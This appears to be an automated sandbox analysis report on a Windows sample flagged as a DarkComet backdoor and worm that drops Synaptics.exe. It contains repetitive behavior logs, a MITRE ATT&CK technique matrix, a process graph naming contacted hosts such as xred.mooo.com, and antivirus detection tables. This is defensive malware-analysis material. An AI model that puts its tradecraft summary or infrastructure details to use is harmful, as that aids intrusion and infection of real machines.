                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C865C0 cpuid 1_2_00C865C0
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0040B2D4 GetLocalTime,0_2_0040B2D4
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00407136 GetTimeZoneInformation,0_2_00407136
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00406E1D GetUserNameA,RegCloseKey,RegCreateKeyExA,RegFlushKey,RegNotifyChangeKeyValue,RegOpenKeyExA,RegQueryValueExA,RegSetValueExA,BeginUpdateResourceA,0_2_00406E1D
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0040713E GetVersion,0_2_0040713E
                              Source: ._cache_A1FsbRkm5m.exeBinary or memory string: 360safe.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.426450295.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.315661422.00000000008E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                              Source: ._cache_A1FsbRkm5m.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.541096953.0000000004450000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\MACHINE\Software\WOW6432Node\360Safe\Liveupws\CurrentVersion\App Paths\360safe.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: cmd.exe /C 2_2_00475384
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: cmd.exe /C 5_2_00475384
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0047C7BC bind,2_2_0047C7BC

                              Mitre Att&ck Matrix

                              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                              1
                              Replication Through Removable Media                              		41
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Exploitation for Privilege Escalation                              		1
                              Disable or Modify Tools                              		21
                              Input Capture                              		2
                              System Time Discovery                              		1
                              Replication Through Removable Media                              		1
                              Archive Collected Data                              		Exfiltration Over Other Network Medium4
                              Ingress Tool Transfer                              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                              Default Accounts2
                              Native API                              		1
                              Bootkit                              		1
                              DLL Side-Loading                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop Protocol1
                              Screen Capture                              		Exfiltration Over Bluetooth11
                              Encrypted Channel                              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain Accounts12
                              Command and Scripting Interpreter                              		Logon Script (Windows)1
                              Access Token Manipulation                              		41
                              Scripting                              		Security Account Manager1
                              Account Discovery                              		SMB/Windows Admin Shares21
                              Input Capture                              		Automated Exfiltration1
                              Non-Standard Port                              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local AccountsAt (Windows)Logon Script (Mac)12
                              Process Injection                              		2
                              Obfuscated Files or Information                              		NTDS5
                              File and Directory Discovery                              		Distributed Component Object Model1
                              Clipboard Data                              		Scheduled Transfer3
                              Non-Application Layer Protocol                              		SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                              Software Packing                              		LSA Secrets57
                              System Information Discovery                              		SSHKeyloggingData Transfer Size Limits24
                              Application Layer Protocol                              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.commonRc.common1
                              DLL Side-Loading                              		Cached Domain Credentials281
                              Security Software Discovery                              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup ItemsStartup Items12
                              Masquerading                              		DCSync31
                              Virtualization/Sandbox Evasion                              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
                              Virtualization/Sandbox Evasion                              		Proc Filesystem3
                              Process Discovery                              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                              Access Token Manipulation                              		/etc/passwd and /etc/shadow11
                              Application Window Discovery                              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)12
                              Process Injection                              		Network Sniffing1
                              System Owner/User Discovery                              		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                              Bootkit                              		Input Capture1
                              Remote System Discovery                              		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                              Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                              System Network Configuration Discovery                              		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 628251 Sample: A1FsbRkm5m.rl Startdate: 17/05/2022 Architecture: WINDOWS Score: 100 40 xred.mooo.com 2->40 64 Snort IDS alert for network traffic 2->64 66 Antivirus detection for URL or domain 2->66 68 Antivirus detection for dropped file 2->68 70 10 other signatures 2->70 8 A1FsbRkm5m.exe 1 6 2->8         started        11 EXCEL.EXE 2->11         started        13 Synaptics.exe 2->13         started        signatures3 process4 file5 32 C:\Users\user\...\._cache_A1FsbRkm5m.exe, PE32 8->32 dropped 34 C:\ProgramData\Synaptics\Synaptics.exe, PE32 8->34 dropped 36 C:\ProgramData\Synaptics\RCX4F28.tmp, PE32 8->36 dropped 38 C:\...\Synaptics.exe:Zone.Identifier, ASCII 8->38 dropped 15 Synaptics.exe 262 8->15         started        20 ._cache_A1FsbRkm5m.exe 19 42 8->20         started        process6 dnsIp7 42 docs.google.com 142.250.186.46, 443, 49732, 49733 GOOGLEUS United States 15->42 44 freedns.afraid.org 69.42.215.252, 49735, 80 AWKNET-LLCUS United States 15->44 50 2 other IPs or domains 15->50 26 C:\Users\user\DocumentsIVQSAOTAQ\~$cache1, PE32 15->26 dropped 54 Antivirus detection for dropped file 15->54 56 Multi AV Scanner detection for dropped file 15->56 58 Drops PE files to the document folder of the user 15->58 62 2 other signatures 15->62 22 WerFault.exe 15->22         started        24 WerFault.exe 15->24         started        46 111.13.65.20, 80 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 20->46 48 seupdate.360qhcdn.com 111.13.65.25, 80 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 20->48 52 15 other IPs or domains 20->52 28 C:\Users\user\AppData\Local\...\sites.dll, PE32 20->28 dropped 30 C:\Users\user\AppData\Local\...\360P2SP.dll, PE32 20->30 dropped 60 Contains functionality to infect the boot sector 20->60 file8 signatures9 process10

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              A1FsbRkm5m.exe88%ReversingLabsWin32.Backdoor.DarkComet
                              A1FsbRkm5m.exe100%AviraWORM/Dldr.Agent.gqrxn
                              A1FsbRkm5m.exe100%AviraW2000M/Dldr.Agent.17651006
                              A1FsbRkm5m.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraWORM/Dldr.Agent.gqrxn
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCX4F28.tmp100%AviraWORM/Dldr.Agent.gqrxn
                              C:\ProgramData\Synaptics\RCX4F28.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\EIVQSAOTAQ\~$cache1100%AviraWORM/Dldr.Agent.gqrxn
                              C:\Users\user\Documents\EIVQSAOTAQ\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX4F28.tmp100%Joe Sandbox ML
                              C:\Users\user\Documents\EIVQSAOTAQ\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX4F28.tmp90%ReversingLabsWin32.Backdoor.DarkComet
                              C:\ProgramData\Synaptics\Synaptics.exe88%ReversingLabsWin32.Backdoor.DarkComet
                              C:\Users\user\AppData\Local\Temp\{5E55AF9C-DBB2-486f-91C7-C9168C19150A}.tmp\360P2SP.dll3%MetadefenderBrowse
                              C:\Users\user\AppData\Local\Temp\{5E55AF9C-DBB2-486f-91C7-C9168C19150A}.tmp\360P2SP.dll4%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll0%ReversingLabs
                              C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe3%MetadefenderBrowse
                              C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe4%ReversingLabs
                              C:\Users\user\Documents\EIVQSAOTAQ\~$cache190%ReversingLabsWin32.Backdoor.DarkComet

                              Unpacked PE Files

                              SourceDetectionScannerLabelLinkDownload
                              5.0.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                              5.0.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                              5.2.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                              5.2.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                              2.2.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                              2.2.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
